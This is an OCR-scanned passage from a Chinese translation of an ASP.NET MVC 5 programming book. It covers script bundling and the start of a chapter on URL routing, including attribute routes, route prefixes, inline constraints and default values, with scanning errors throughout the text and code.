配 模式 的 jQuery UI 脚本 ， 所 以 它 会 包含 jquery.validate.js 和 jquery.validate.unobtrusive.js。 运 行 
时 非常 智能 ， 它 能 根据 标准 JavaScript 命 名 约定 区 分 JavaScript 库 是 精简 版 本 还 是 非 精简 版 本 。 
它 还 会 自动 忽略 包含 智能 感知 文档 或 源 映射 信息 的 文件 。 可 在 BundleConfig.cs 中 创建 和 修改 
自己 的 捆绑 。 自 定义 捆绑 可 以 包含 自 定义 的 微小 逻辑 ， 完 成 许多 操作 。 例 如 ， 只 用 几 行 代码 
和 一 个 NuGet 包 ， 就 可 以 创建 一 个 自 定义 捆绑 ， 将 CoffeeScript 编 译 成 JavaScript， 然 后 传递 给 
标准 的 微小 管道 。 

一 旦 捆绑 配置 ， 我 们 就 能 够 使 用 Scripts 和 Styles 辅 助 类 演 染 捆绑 。 下 面 的 代码 就 会 输出 
jQuery 捆绑 和 默认 的 应 用 程序 样式 表 : 


GScripts.Render ("-/bundles/jquery") 


207 


208 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


GStyles.Render ("-/Content/css") 


传递 给 Render 方 法 的 参数 是 用 来 创建 捆绑 的 虚拟 路 径 。 当 应 用 程序 运行 在 debug 模 式 时 
(特别 在 web.config 的 compilation 节 中 把 debug 标 签 设 置 为 tue)， 脚 本 和 样式 辅助 方法 就 会 为 捆 
绑 中 的 每 个 文件 泻 染 一 个 script 标 签 。 当 应 用 程序 运行 在 release 模 式 时 ， 辅 助 方法 会 把 捆绑 中 
的 所 有 文件 合并 成 一 个 下 载 文件 , 然后 在 输出 中 放置 一 个 链接 或 script 元 素 。 在 release 模 式 中 ， 
辅助 方法 默认 也 精简 文件 减 小 下 载 的 数据 量 。 


8.6 小 结 


本 章 对 ASPNET MVC 5 中 的 Ajax 特 性 进行 了 快速 扼要 的 介绍 。 学 习 完 本 章 ， 应 该 知道 这 
些 特性 主要 依赖 于 开源 jQuery 库 和 一 些 流行 的 jQuery 插件 。 

成 功 学 习 ASPNET MVC 5 中 的 Ajax 特性 的 关键 是 理解 jQuery， 并 在 项 目 中 使 用 jQuery。 
jQuery 不 仅 灵活 强大 ， 还 可 以 使 脚本 代码 与 标记 分 离 ， 以 及 编写 非 侵入 式 JavaScript 代 码 。 这 就 
意味 着 我 们 可 以 集中 精力 编写 更 好 的 JavaScript 代 码 ， 并 拥有 jQuery 提供 的 所 有 功能 。 

本 章 还 介绍 了 客户 端 模板 的 用 法 以 及 控制 器 操作 中 的 JSON 服 务 。 尽管 可 以 很 容易 地 从 控 
制 器 操作 生成 JINON， 但 是 我 们 也 可 以 用 Web API 生 成 ISON。 当 构建 生成 数据 的 Web 服 务 时 ， 
Web API 还 包括 其 他 一 些 功能 和 灵活 性 。 关于 Web API 的 内 容 , 我 们 会 在 第 11 章 进行 详细 介绍 。 

一 些 应 用 程序 几乎 完全 依赖 于 JavaScript 与 没有 或 很 少 有 页 面 请 求 的 后 端 服 务 进行 交互 。 
这 种 应 用 程序 被 称 为 单 页 面 应 用 程序 (single page application，SPA)。 第 12 章 将 详细 介绍 SPA。 


本 章 主要 内 容 

理解 URL 

路 由 概述 

浅 谈 路 由 的 底层 实现 

高 级 路 由 

路 由 的 扩展 性 

如 何 同时 使 用 Web Forms 和 路 由 


软件 开发 人 员 常 常 对 一 些小 的 细节 问题 倍加 关注 ， 尤 其 在 考虑 源 代 码 的 质量 和 结构 时 更 是 如 
此 。 我 们 常常 为 代码 缩 排 的 风格 以 及 花 括 号 的 范围 而 争论 不 休 。 笔 者 看 来 ， 这 些 斗争 愈 演 念 烈 。 

因此 ， 当 遇 到 大 部 分 使 用 ASPNET 技 术 构建 的 站 点 ， 使 用 如 下 所 示 的 URL 地 址 时 ， 可 能 会 
些 奇 怪 : 


http://example.com/albums/list.aspx?catid=17313&genreid=33723&page=3 


我 们 既然 对 代码 倍加 重视 ， 为 什么 不 能 同样 地 重视 URL 呢 ? 虽然 URL 看 上 去 并 不 是 那么 重 
要 ， 但 它 却 是 一 种 合法 的 且 广 泛 使 用 的 Web 用 户 接 

本 章 主要 介绍 如 何 将 逻辑 URL 肌 射 到 控制 器 上 的 操作 方法 。 此 外 ， 本 章 还 会 介绍 ASPNET 路 
由 特性 ， 这 是 一 个 单独 API，ASPNET MVC 框 架 通过 它 的 调用 可 以 把 URL 映 射 到 方法 的 调用 。 本 
章 将 介绍 传统 的 路 由 以 及 ASPNET MVC 5 中 新 引入 的 特性 路 由 。 首 先 介 绍 ASPNET MVC 框 架 如 
何 使 用 路 由 ， 然 后 再 简单 介绍 作为 单独 特性 的 路 由 的 底层 工作 原理 。 


9.1 统一 资源 定位 符 一 一 URL 


可 用 性 专家 Jakob Nielsen(wwwuseit.com) 力 劝 开发 人 员 重 视 URL(Uniform Resource 
Locator)， 并 指出 高 质量 的 URL 应 该 满足 以 下 几 点 要 求 : 
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域名 便于 记忆 和 拼写 

简短 

便于 输入 

可 以 反映 出 站 点 结构 

应 该 是 “可 破解 的 ”， 用 户 可 以 通过 移 除 URL 的 末尾 ， 进 而 到 达 更 高 层次 的 信息 体系 
结构 

e 持久 、 不 能 改变 

按照 传统 ， 在 很 多 Web 框 架 中 (如 经 典 的 ASP、JSP、PHP、ASPNET 之 类 的 框架 )，URL 代 表 
的 是 磁盘 上 的 物理 文件 。 例 如 ， 当 看 到 请 求 一 http:/example.comyalbums/listaspx 时 ， 我 们 可 以 确 
定 该 站 点 的 目录 结构 中 含有 一 个 albums 文 件 夹 ， 并 且 在 该 文件 夹 下 还 有 一 个 list.aspx 文 件 。 

在 上 述 示例 中 ，URL 和 磁盘 上 物理 存在 的 内 容 存在 直接 的 对 应 关系 。 当 Web 服 务 器 接收 到 该 
URI 的 请 求 时 ， 为 了 响应 客户 端 请 求 ， 它 就 会 执行 一 些 与 该 文件 相关 联 的 代码 。 

URL 和 文件 系统 之 间 这 种 一 一 对 应 的 关系 并 不 适用 于 大 部 分 基于 MVC 的 Web 框 架 ， 如 
ASPNET MVC。 一 般 来 说 ， 这 些 框 架 应 用 不 同 的 方法 把 URL 映 射 到 某 个 类 的 方法 调用 ， 而 不 是 
映射 到 磁盘 上 的 某 个 物理 文件 。 

正如 在 第 2 章 中 看 到 的 ， 这 些 映 射 到 的 类 通常 称 作 控 制 器 ， 之 所 以 这 样 称呼 ， 是 因为 它们 主 
要 用 来 控制 用 户 输入 和 系统 组 件 之 间 的 交互 。 用 来 响应 用 户 请 求 的 方法 通常 称 作 操 作 ， 它 们 代表 
了 控制 器 为 响应 用 户 输入 请 求 而 处 理 的 各 种 操作 。 

有 人 可 能 会 认为 URL 是 访问 文件 的 一 种 方法 ， 对 于 习惯 了 这 些 想 法 的 人 来 说 ， 把 URL 映 射 为 
类 的 方法 调用 可 能 会 让 他 们 感到 很 不 自然 ， 他 们 认为 URI 就 是 统一 资源 定位 符 (Uniform Resource 
Locaton) 的 首 字 母 缩写 。 这 种 情况 下 ， 资 源 是 一 个 抽象 概念 ， 既 可 以 指 一 个 文件 ， 也 可 以 指 方法 调 
用 的 结果 或 服务 器 上 的 一 些 其 他 内 容 。 

通常 情况 下 ，URI 代 表 统 一 资源 标识 符 (Uniform Resource Identifier)。URI 是 标识 了 一 个 资源 的 

字符 串 。 从 技术 角度 看 , 所 有 URL 都 是 URI。W3C 认 为 “URL 是 一 个 非 正 式 的 概念 , 但 它 非常 有 用 : 
URL 是 URI 的 一 种 类 型 ， 它 通过 表示 自身 的 主要 访问 机 制 来 标识 资源 ”( 引 自 
www.w3.org/TR/uri-clarification/#contemporary)。 换 句 话说 ，URI 是 某 种 资源 的 标识 符 ， 而 URIL 则 为 
获取 该 资源 提供 了 具体 的 信息 。 
所 有 这 些 争 议 都 只 是 语义 上 的 ， 不 管 使 用 什么 名 称 ， 大 部 分 人 都 领会 它 的 意义 。 然 而 ， 上 面 
的 讨论 对 我 们 学 习 MVC 很 有 帮助 ， 因 为 它 提醒 我 们 URL 未 必 是 指 Web 服 务 器 硬盘 中 的 静态 资源 文 
fF: 对 于 ASPNETMVC 而 言 ， 大 多 数 情况 都 并 非 如 此 。 鉴 于 以 上 所 述 ， 本 书 今后 一 律 使 用 传统 术 
语 URL。 


9.2 ”路 由 概述 


ASPNET MVC 框 架 中 的 路 由 主要 有 两 种 用 途 : 

o 匹配 传 入 的 请 求 (该 请 求 不 匹配 服务 器 文件 系统 中 的 文件 )， 并 把 这 些 请 求 映射 到 控制 器 
操作 。 

e 构造 传 出 的 URL， 用 来 响应 控制 器 操作 。 

以 上 两 项 内 容 只 是 描述 了 路 由 在 ASPNETMVC 应 用 程序 下 的 用 途 。 本 章 后 面部 分 会 深入 探讨 


路 由 选择 的 其 他 功能 ， 并 介绍 如 何在 ASPNET 中 使 用 这 些 功 能 。 


注意 路 由 和 ASPNET MVC 的 关系 是 困惑 我 们 的 一 个 永恒 话题 。 在 预测 试 阶 
段 ， 路 由 是 ASPNET MVC 的 一 个 集成 特性 。 然 而 ， 开 发 团队 看 到 了 它 可 以 作为 
ASPNETMVC 的 一 个 有 用 特性 ， 用 来 构建 Web 页 面 ， 因 此 ， 它 作为 ASPNET 核 心 框 
架 的 一 部 分 ， 被 提取 到 它 自 己 的 程序 集中 。 它 的 名 称 定 为 ASPNET 路 由 ， 但 是 大 家 
喜欢 简称 它 为 路 由 。 

我 们 把 路 由 添加 到 ASPNET 中 , 路 由 就 成 为 NET 框 架 (和 Windows) 的 一 部 分 。 E 
此 ， 尽 管 ASPNET MVC 经 常 更 新 版 本 ， 但 是 路 由 的 更 新 很 大 程度 上 受制 于 NET 框 
架 的 更 新 ; 因此 ， 这 些 年 路 由 基本 没有 太 大 变化 。 

在 ASPNET 外 部 ，ASPNET Web API 是 可 装载 的 ， 这 样 它 就 可 以 不 需要 直接 使 
用 ASPNET 路 由 。 相 反 ， 它 引入 了 路 由 代码 的 副本 。 但 是 当 ASPNET Web API 托 管 
在 ASPNET 上 时 ， 我 们 就 把 所 有 Web API 路 由 映射 到 ASPNET 路 由 的 核心 路 由 集中 。 
关于 路 由 在 ASPNET Web API 中 的 应 用 ， 第 11 章 会 进行 详细 介绍 。 


9.2.4 对 比 路 由 和 URL 重 写 


为 更 好 地 理解 路 由 ， 很 多 开发 人 员 喜 欢 把 它 与 URL 重 写 进行 对 比 。 因 为 这 两 种 方法 都 可 用 于 
分 离 传 入 URL 和 结束 处 理 请 求 。 此 外 ， 它 们 也 都 可 以 为 搜索 引擎 优化 (Search Engine Optimization, 
SEO) 构 建 “ 漂 亮 的 ”URL。 

然而 ， 它 们 之 间 也 有 很 大 区 别 。 它 们 的 关键 区 别 在 于 ，URI 重 写 关注 的 是 将 一 个 URL 映 射 到 
另 一 个 URL。 例 如 ，URL 重 写 经 常用 来 把 旧 的 URL 映 射 到 新 的 URL。 与 之 相 比 ， 路 由 关注 的 则 是 
如 何 将 URL 映 射 到 资源 。 

我 们 可 能 会 说 ， 路 由 表示 以 资源 为 中 心 的 URL 视 图 。 这 种 情况 下 ，URIL 代 表 了 Web 上 的 一 个 
资源 (未 必 是 页 面 )。 在 ASPNET 路 由 中 ， 这 个 资源 就 是 一 段 代码 ， 当 传 入 的 请 求 与 路 由 匹配 时 就 
会 执行 该 段 代 码 。 路 由 决定 了 如 何 根据 URL 特 征调 度 请 求 一 它 不 会 重 写 URL。 

路 由 和 重 写 的 另 一 个 重要 区 别 是 : 路 由 也 使 用 它 在 匹配 传 入 URL 时 用 到 的 映射 规则 来 帮助 生 
成 URL， 而 URL 重 写 只 能 用 于 传 入 的 请 求 URL， 而 不 能 帮助 生成 原始 的 URL。 

另 一 种 看 法 是 ASPNET 路 由 更 像 是 双向 的 URL 重 写 。 然 而 这 一 说 法 是 缺乏 依据 的 ， 因 为 
ASPNET 路 由 机 制 实际 上 从 来 都 没有 重 写 URL。 用 户 从 浏览 器 中 发 出 的 请 求 URL 与 应 用 程序 在 整 
个 请 求 的 生命 周期 中 看 到 的 URL 是 相同 的 ， 从 未 改变 。 


9.22 ”路 由 方法 


理解 了 路 由 的 作用 后 ， 下 一 步 就 是 学 习 如 何 定义 路 由 。MVC 一 直 支 持 使 用 集中 的 、 强 制 的 、 
基于 代码 的 风格 来 定义 路 由 ， 我 们 将 其 称 为 传统 路 由 。 这 是 一 个 很 好 的 选项 ， 现 在 仍 得 到 完整 支 
TR. du MVC 5 添加 了 另外 一 个 在 控制 器 类 或 操作 方法 上 使 用 声明 式 特性 的 选项 ， 称 为 特性 路 
由 。 这 个 新 选项 更 加 简单 ， 并 且 将 路 由 URI 与 控制 器 代码 放 在 一 起 。 两 种 选项 都 可 以 很 好 地 工作 ， 
并 且 都 十 分 灵活 ， 能 够 处 理 复杂 的 路 由 场景 。 选 择 哪个 选项 主要 取决 于 个 人 的 风格 和 喜好 。 
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我 们 首先 介绍 最 简单 的 路 由 ， 即 特性 路 由 ， 然 后 以 学 到 的 知识 为 基础 ， 介 绍 传统 路 由 。 两 种 
选项 介绍 完 以 后 ， 我 们 将 说 明 如 何在 这 两 种 选项 之 间 做 出 选择 。 


9.23 ”定义 特性 路 由 


每 个 ASPNET MVC 应 用 程序 都 需要 路 由 来 定义 自己 处 理 请 求 的 方式 。 路 由 是 MVC 应 用 程序 
的 入 口 点 。 本 节 主 要 介绍 如 何 定义 路 由 ， 以 及 它们 如 何 把 请 求 映射 到 可 执行 的 代码 。 首 先 介绍 最 
单 的 特性 路 由 , 这 是 在 ASPNETMVC 5 中 新 增 的 。 然 后 ,介绍 从 ASPNET MVC 1 开始 就 可 以 使 
的 传统 路 由 。 
介绍 细节 之 前 ， 首 先 快速 了 解 定义 特性 路 由 时 涉及 的 主要 概念 。 路 由 的 定义 是 从 URI 模板 开 
始 的 ， 因 为 它 指定 了 与 路 由 相 匹 配 的 模式 。 路 由 定义 可 以 作为 控制 器 类 或 操作 方法 的 特性 。 路 由 
可 以 指定 它 的 URL 及 其 默认 值 ， 此 外 ， 它 还 可 以 约束 URI 的 各 个 部 分 ， 提 供 关于 路 由 如 何以 及 何 
时 与 传 入 的 请 求 URL 相 匹配 的 严格 控制 。 
当 构 造 传 出 URL 时 (路 由 的 第 二 个 主要 用 途 )， 路 由 可 以 有 名 称 。 稍 后 会 介绍 路 由 的 命名 。 
下 面 从 非常 简单 的 路 由 开始 介绍 ， 并 在 此 基础 上 逐步 深入 。 


1. 路 由 URL 


创建 一 个 ASPNET MVC Web 应 用 程序 项 目 后 , 快速 浏览 一 下 Globalasax.cs 文 件 中 的 代码 , 我 
们 会 注意 到 ，Application_Start 方 法 中 调用 了 一 个 名 为 RegisterRoutes 的 方法 。 该 方法 是 集中 控制 路 
由 的 地 方 ， 包含 在 ~/App_Star/RouteConfig.cs 文 件 中 。 因 为 我 们 从 特性 路 由 开始 讲 起 ， 所 以 现在 将 
删除 RegisterRoutes 方 法 中 的 所 有 内 容 ， 只 通过 调用 MapMvcAttibuteRoutes 注 册 方 法 让 
RegisterRoutes 方 法 启用 特性 路 由 。 修 改 后 的 RegisterRoutes 方 法 如 下 所 示 : 

public static void RegisterRoutes (RouteCollection routes) 

{ 


routes.MapMvcAttributeRoutes(); 
) 


现在 就 可 以 编写 我 们 的 第 一 个 路 由 了 。 路 由 的 核心 工作 是 将 一 个 请 求 映射 到 一 个 操作 。 完 成 
这 项 工作 最 简单 的 方法 是 在 一 个 操作 方法 上 直接 使 用 一 个 特性 : 


public class HomeController : Controller 
{ 

[Route ("about")] 

public ActionResult About () 

t 


z3 


return View(); 
} 
} 
每 当 收 到 URI 为 /about 的 请 求 时 ， 这 个 路 由 特性 就 会 运行 About 方 法 。 我 们 告诉 MVC 使 用 的 
URL，MVC 会 运行 我 们 编写 的 代码 。 再 简单 不 过 了 。 
如 果 对 于 操作 有 多 个 URL, 就 可 以 使 用 多 个 路 由 特性 。 例 如, 我 们 可 能 想 让 首页 通过 /、 /home 
和 /home/index 这 几 个 URL 都 能 访问 。 这 时 ， 路 由 如 下 所 示 : 


[Route ("")] 


[Route ("home") ] 
[Route ("home/index")] 
public ActionResult Index() 
{ 

return View(); 
} 


传 入 路 由 特性 的 字符 串 叫 做 路 由 模板 ， 它 就 是 一 个 模式 匹配 规则 ， 决 定 了 这 个 路 由 是 否 适 / 
于 传 入 的 请 求 。 如 果 匹 配 ，MVC 就 运行 路 由 的 操作 方法 。 对 于 前 面 的 路 由 ,我 们 使 用 了 静态 值 作 
为 路 由 模板 ， 如 about 或 home/index， 所 以 只 有 当 URI 路 径 具 有 完全 相同 的 字符 串 时 ， 路 由 才 会 与 
之 匹配 。 这 样 的 静态 路 由 看 上 去 很 简单 ， 但 是 它们 实际 上 能 够 处 理应 用 程序 的 许多 场景 。 

2. 路 由 值 

对 于 最 简单 的 路 由 ， 非 常 适合 使 用 刚才 介绍 的 静态 路 由 ， 但 并 不 是 每 个 URL 都 是 静态 的 。 例 
如 ， 如 果 操 作 显 示 个 人 记录 的 详情 ， 那 么 可 能 需要 在 URL 中 包含 记录 的 ID。 通 过 添加 路 由 参数 可 
解决 这 个 问题 : 

[Route ("person/{id}")] 


public ActionResult Details(int id) 
{ 


// Do some work 
return View(); 
) 


通过 使 用 花 括号 括 住 d， 就 为 以 后 想 要 通过 名 称 引用 的 一 些 文本 创建 了 一 个 占 位 符 。 确 切 地 
说 ， 这 么 做 捕获 了 一 个 路 径 段 ， 也 就 是 URI 路 径 中 由 斜 杠 分 隔 的 几 个 部 分 之 一 ， 但 是 不 包含 斜 杠 。 
为 了 查看 其 用 法 ， 我 们 像 下 面 这 样 定义 一 个 路 由 : 


[Route ("{year}/{month}/{day}")] 
public ActionResult Index(string year, string month, string day) 
{ 
// Do some work 
return View(); 
} 


表 9-1 显 示 了 上 面 代码 中 定义 的 路 由 如 何 将 特定 的 URL 和 解析 为 路 由 参数 。 


表 9-1 路 由 参数 值 映射 示例 


URL 路 由 参数 值 


/2014/April/10 year = "2014" 
month = "April" 
day - "10" 
/foo/bar/baz year — "foo" 
month — "bar" 


day — "baz" 


/a.b/c-d/e-£ year — "a.b" 
month — "c-d" 


day — "e-f" 
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在 上 面 的 方法 中 ， 特 性 路 由 会 匹配 任何 分 为 三 段 的 URL， 因 为 默认 情况 下 ， 路 由 参数 会 匹配 
任何 非 空 值 。 当 这 个 路 由 匹配 一 个 分 为 三 段 的 URL 时 ， 该 URI 第 一 段 中 的 文本 对 应 于 {year} 路 由 
参数 ， 第 二 段 中 的 值 对 应 于 {month} 路 由 参数 ， 第 三 段 中 的 值 对 应 于 {day} 路 由 参数 。 

可 以 任意 命名 这 些 参 数 (支持 字母 数字 字符 和 其 他 几 个 字符 )。 收 到 请 求 时 ， 路 由 会 解析 请 求 
URL， 并 将 路 由 参数 值 放 到 一 个 字典 中 (具体 来 说 ， 就 是 可 以 通过 RequestContext 访 问 的 
RouteValueDictionary)， 路 由 参数 名 称 作为 键 ， 根 据 位 置 对 应 的 URL 子 节 作为 值 。 

当 特性 路 由 匹配 并 运行 操作 方法 时 ， 模 型 绑 定 会 使 用 路 由 的 路 由 参数 为 同名 的 方法 参数 填充 
值 。 后 面 会 讨论 路 由 参数 与 方法 参数 的 不 同 点 。 


3. 控制 器 路 由 
前 面 看 到 了 如 何 把 路 由 特性 直接 添加 到 操作 方法 上 。 但 是 很 多 时 候 ， 控 制 器 类 中 的 方法 遵循 


的 模式 具有 相似 的 路 由 模板 。 考 虑 一 个 简单 的 HomeController 控 制 器 (如 新 MVC 应 用 程序 中 的 那样 ) 
的 路 由 : 


public class HomeController : Controller 
{ 


[Route ("home/index")] 
public ActionResult Index() 
{ 

return View(); 
) 


[Route ("home/about") ] 
public ActionResult About () 
t 

return View(); 
) 


[Route ("home/contact")] 
public ActionResult Contact () 
{ 
return View(); 
} 
} 


除了 URL 的 最 后 一 段 ， 这 些 路 由 是 相同 的 。 如 果 有 一 种 方法 能 避免 重 复 编写 代码 ， 直 接 说 明 
每 个 操作 方法 都 映射 到 home 下 的 一 个 URL， 不 是 很 好 吗 ? 幸运 的 是 ， 有 这 样 的 方法 : 


[Route ("home/ {action}")] 
public class HomeController : Controller 
{ 
public ActionResult Index() 
{ 
return View(); 
} 


public ActionResult About () 
t 

return View(); 
} 


public ActionResult Contact () 


t 
return View(); 


$ 
} 


我 们 删除 了 每 个 方法 上 方 的 所 有 路 由 特性 ， 并 使 用 控制 器 类 的 一 个 特性 来 代替 它们 。 在 控制 
器 类 上 定义 路 由 时 , 可 以 使 用 一 个 叫做 action 的 特殊 路 由 参数 , 它 可 以 作为 任意 操作 名 称 的 占 位 符 。 
action 参 数 的 作用 相当 于 在 每 个 操作 方法 上 单独 添加 路 由 ， 并 静态 输入 操作 名 ; 它 只 是 一 种 更 加 方 
便 的 语法 而 已 。 就 像 操作 方法 一 样 ， 控 制 器 类 上 也 可 以 有 多 个 路 由 特性 。 

有 时 控制 器 上 的 某 些 操作 具有 与 其 他 操作 稍微 不 同 的 路 由 。 此 时 ， 我 们 可 以 把 最 通用 的 路 由 
放 到 控制 器 上 , 然后 在 具有 不 同 路 由 模式 的 操作 上 重 写 默认 路 由 。 例如 , 如 果 我 们 认为 /home/index 
过 于 元 长 ， 但 是 又 想 支持 home， 就 可 以 使 用 下 面 的 代码 : 


[Route ("home/ {action}")] 
public class HomeController : Controller 
{ 

[Route ("home")] 

[Route ("home/index")] 

public ActionResult Index() 

t 

return View(); 
} 


public ActionResult About () 


{ 
return View(); 


} 


public ActionResult Contact () 


{ 
return View(); 


) 
) 


在 操作 方法 级 别 指定 路 由 特性 时 , 会 覆盖 控制 器 级 别 指定 的 任何 路 由 特性 。 在 前 面 的 例子 中 ， 
如 果 Index 方 法 只 有 第 一 个 路 由 特性 (home)， 那 么 尽管 控制 器 有 一 个 默认 路 由 home/{action}， 也 不 
能 通过 home/index 来 访问 Index 方 法 。 如 果 我 们 要 自 定义 某 个 操作 的 路 由 ， 并 且 仍 希望 应 用 默认 的 
控制 器 路 由 ， 就 需要 在 操作 上 再 次 列 出 控制 器 路 由 。 
前 面 的 类 仍然 带 有 重复 性 。 每 个 路 由 都 以 home/ 开 头 ( 毕 竞 ， 类 的 名 称 是 HomeController)。 通 
过 使 用 RoutePrefix， 可 以 仅 在 一 个 地 方 指定 路 由 以 home/ 开 头 : 

[RoutePrefix ("home")] 

[Route (" (action)")] 


public class HomeController : Controller 
{ 


[Route ("")] 

[Route ("index")] 

public ActionResult Index() 
t 
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return View(); 
} 


public ActionResult About () 
t 

return View(); 
) 


public ActionResult Contact () 
t 


return View(); 
} 
i 
现在 ， 所 有 路 由 特性 都 可 以 省 略 home/， 因 为 前 组 会 自动 为 它们 加 上 home/。 这 个 前 缀 只 是 一 
个 默认 值 ， 必 要 时 可 以 覆盖 该 行为 。 例 如 ， 除 了 支持 home 和 /home/index 以 外 ， 我 们 还 想 让 
HomeController 支 持 /。 为 此 ， 使 用 ~/ 作 为 路 由 模板 的 开头 ， 路 由 前 级 就 会 被 忽略 。 在 下 面 的 代码 
中 ，HomeController 的 Index 方 法 支持 全 部 三 种 URL(/、/home 和 /home/index): 


[RoutePrefix ("home")] 
[Route ("(action)")] 
public class HomeController : Controller 
t 
[Route ("~/")] 
[Route("")] // You can shorten this to [Route] if you prefer. 
[Route ("index")] 
public ActionResult Index () 
t 
return View(); 
) 


public ActionResult About () 
{ 

return View(); 
) 


public ActionResult Contact () 
t 
return View(); 
D 
} 


4. 路 由 约束 


因为 方法 参数 的 名 称 正好 位 于 路 由 特性 及 路 由 参数 名 称 的 下 方 ， 所 以 很 容易 忽视 这 两 种 参数 
的 区 别 。 但 是 在 调试 时 ， 理 解 路 由 参数 与 方法 参数 的 区 别 十 分 重要 。 回 忆 一 下 前 面 使 用 记录 ID 的 
例子 : 

[Route ("person/(id)")] 


public ActionResult Details(int id) 


I 
// Do some work 
return View(); 
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对 于 这 个 路 由 , 考虑 一 下 当 收 到 对 /personbob 这 个 URI 的 请 求 时 会 发 生 什么 。id 的 值 是 什么 ? 
这 是 一 个 容易 出 错 的 问题 : 答案 取决 于 这 里 指 的 是 哪个 d， 是 路 由 参数 还 是 操作 方法 的 参数 。 前 
面 看 到 ， 路 由 中 的 路 由 参数 会 匹配 任何 非 空 值 。 因 此 ， 在 路 由 中 ， 路 由 参数 id 的 值 是 pob， 所 以 路 
由 匹配 。 但 是 后 面 ， 当 MVC 尝 试 运行 操作 时 ， 会 看 到 操作 方法 将 其 jd 方法 参数 声明 为 int 类 型 ， 而 
路 由 参数 中 的 值 bob 不 能 被 转换 为 一 个 int 值 。 所 以 方法 不 能 执行 ， 我 们 访问 不 了 方法 参数 id 的 值 。 

那么 ， 如 果 我 们 想 同时 支持 /person/bob 和 /person/1， 并 为 每 个 URL 运 行 不 同 的 操作 ， 应 该 怎么 
做 ? 我 们 可 以 尝试 添加 一 个 具有 不 同 特性 路 由 的 方法 重 载 ， 如 下 所 示 : 


[Route ("person/{id}")] 
public ActionResult Details(int id) 
t 
// Do some work 
return View(); 
} 


[Route ("person/ {name}")] 
public ActionResult Details(string name) 
t 
// Do some work 
return View(); 
) 


仔细 查看 路 由 会 发 现 一 个 问题 。 一 个 路 由 使 用 参数 jd， 而 另 一 个 路 由 使 用 参数 name。 看 上 去 
很 明显 ，name 应 该 是 一 个 字符 串 ，id 应 该 是 一 个 数字 。 但 是 对 于 路 由 来 说 ， 它 们 都 只 是 路 由 参 
数 ， 而 我 们 已 经 看 到 ， 路 由 参数 默认 会 匹配 任何 字符 串 。 所 以 ， 两 个 路 由 都 会 匹配 /personbob 
和 /person/1。 路 由 带 有 二 义 性 ， 当 这 两 个 不 同 的 路 由 都 匹配 时 ， 没 有 什么 好 方法 来 让 正确 的 操作 
运行 。 

这 里 需要 的 是 有 一 种 方式 来 定义 person/fid}， 使 得 只 有 当 iq 是 一 个 int 值 时 ， 该 路 由 才 会 匹配 。 
好 在 ， 确 实 有 这 样 的 一 种 方法 。 这 涉及 了 所 谓 的 路 由 约束 。 路 由 约束 是 一 种 条 件 ， 只 有 满足 该 条 
件 时 ， 路 由 才能 匹配 。 在 本 例 中 ， 我 们 只 需要 一 个 简单 的 it 约束; 


[Route ("person/(id:int)")] 
public ActionResult Details(int id) 
{ 
// Do some work 
return View(); 
) 


[Route ("person/(name)") ] 
public ActionResult Details(string name) 
t 
// Do some work 
return View(); 
i 


注意 这 里 的 关键 区 别 : 我 们 没有 简单 地 将 路 由 参数 定义 为 fid} ， 而 是 将 其 定义 为 {idint}。 像 
这 样 放 到 路 由 模板 中 的 约束 叫做 内 联 约束 。 可 用 的 内 联 约束 有 很 多 ， 如 表 9-2 所 示 。 
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表 9-2 ARAR 
名 称 示例 用 法 d 述 
bool {n:bool} Boolean 值 
datetime (n:datetime] DateTime 值 
decimal (n: decimal] Decimal 值 
double {n:double} Double 值 
float {n:float} Single 值 
guid {n:guid} Guid 值 
int (nint) Int32 值 
long {n:long} Int64 值 
minlength {n:minlength(2)} String 值 ， 至 少 包 含 两 个 字符 
maxlength (n:maxlength(2)) String 值 ， 包 含 不 超过 两 个 字符 
length {nilength(2)} String 值 ， 刚 好 包含 两 个 字符 
{n:length(2,4)} String 值 ， 包 含 两 个 、3 个 或 4 个 字符 
min {nmin(1)} Int64 值 ， 大 于 或 等 于 1 
max {n:max(3)} Int64 值 ， 小 于 或 等 于 3 
range {nrange(1,3)} Int64 值 1、2 或 3 
alpha {n:alpha} String 值 ， 只 包含 字符 A-Z 和 a-z 
regex {nregex (^a*$)) String 值 ， 只 包含 一 个 或 更 多 个 字符 a'(^a+$ 模 式 的 Regex 匹 配 ) 
内 联 路 由 约束 为 控制 路 由 何 时 匹配 提供 了 精细 的 控制 。 如 果 URIL 看 上 去 相似 ， 但 是 具有 不 同 
的 行为 ， 就 可 以 使 用 路 由 约束 来 表达 这 些 URI 之 间 的 区 别 ， 并 把 它们 映射 到 正确 的 操作 。 


5. 路 由 的 默认 值 


至 此 , 本 章 已 经 介绍 完了 定义 路 由 的 方法 , 定义 的 路 由 中 包含 了 匹配 URL 的 模式 。 事实 证 明 ， 
路 由 URL 和 路 由 约束 并 不 是 在 匹配 请 求 时 所 要 考虑 的 唯一 因素 。 我 们 还 可 以 为 路 由 参数 提供 
默认 值 。 假 设 现在 有 一 个 没有 任何 参数 的 Index 操 作 方法 ， 如 下 面 的 代码 所 示 : 

[Route ("home/ (action)")] 


public class HomeController : Controller 
t 


public ActionResult Index() 
t 
return View(); 


} 
public ActionResult About () 
t 
return View(); 
t 


public ActionResult Contact () 
i 
return View(); 


我 们 会 很 自然 地 想到 通过 下 面 的 URL 调 用 这 个 方法 : 
/home 


人 然而， 根据 类 定义 的 路 由 模板 home/{action}， 这 上段 代码 不 能 正常 运行 ， 因 为 前 面 定义 的 路 由 
只 匹配 包含 两 个 段 的 URL， 但 是 /home 只 包含 一 个 段 。 

此 时 ,似乎 需要 定义 一 个 类 似 于 前 面 路 由 格式 的 新 路 由 ,不同 的 是 新 路 由 的 URL 只 包含 一 个 
Pt: home。 但 是 ,这 看 上 去 是 在 做 重复 工作 。 我 们 更 希望 保留 原来 的 路 由 , 计 Index 成 为 默认 的 action。 
路 由 API 人 允许 为 参数 提供 默认 值 。 例 如 ， 可 以 参照 下 面 的 代码 定义 路 由 : 


[Route ("home/ {action=Index}")] 


{action=Index} 这 段 代码 为 {action} 参 数 定义 了 默认 值 。 此 时 ， 该 默认 情况 就 允许 路 由 匹配 没 
有 action 参 数 的 请 求 。 换言之, 该 路 由 现在 既 可 以 匹配 具有 一 个 段 的 URL， 也 可 以 匹配 具有 两 个 段 
的 URL， 而 不 是 仅仅 匹配 具有 两 个 段 的 URL。 现 在 ， 我 们 就 可 以 使 用 URL /home 来 调用 Index 操 作 
方法 ， 因 为 该 URL 可 以 满足 我 们 的 目标 。 

